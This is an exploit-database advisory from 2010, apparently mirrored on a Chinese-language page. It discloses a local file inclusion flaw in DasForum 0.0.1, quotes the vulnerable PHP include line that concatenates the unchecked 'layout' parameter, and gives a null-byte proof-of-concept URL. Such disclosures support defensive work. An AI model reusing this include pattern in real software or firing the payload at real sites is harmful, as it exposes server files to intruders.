DasForum – ‘layout’ Local File Inclusion

• Exploit Database
• 9 阅读

• 作者： cr4wl3r
  日期： 2010-01-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11159/

• \#'#/
  (-.-)
   --------------------oOO---(_)---OOo-------------------
   | DasForum (layout) Local File Inclusion Exploit |
   |(works only with magic_quotes_gpc = off)|
   ------------------------------------------------------
  [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
  [!] Download: http://mirror.vocabbuilder.net/savannah/dasforum/
  [!] Version: 0.0.1
  [!] Date: 15.01.2010
  [!] Remote: yes
  
  
  [!] Vulnerability Code [bbcode_inputs.php] :
  
  include("layouts/".$layout."/bbcode_inputs.php");
  
  
  [!] PoC:
  
  [DasForum_path]/bbcode_inputs.php?layout=[LFI%00]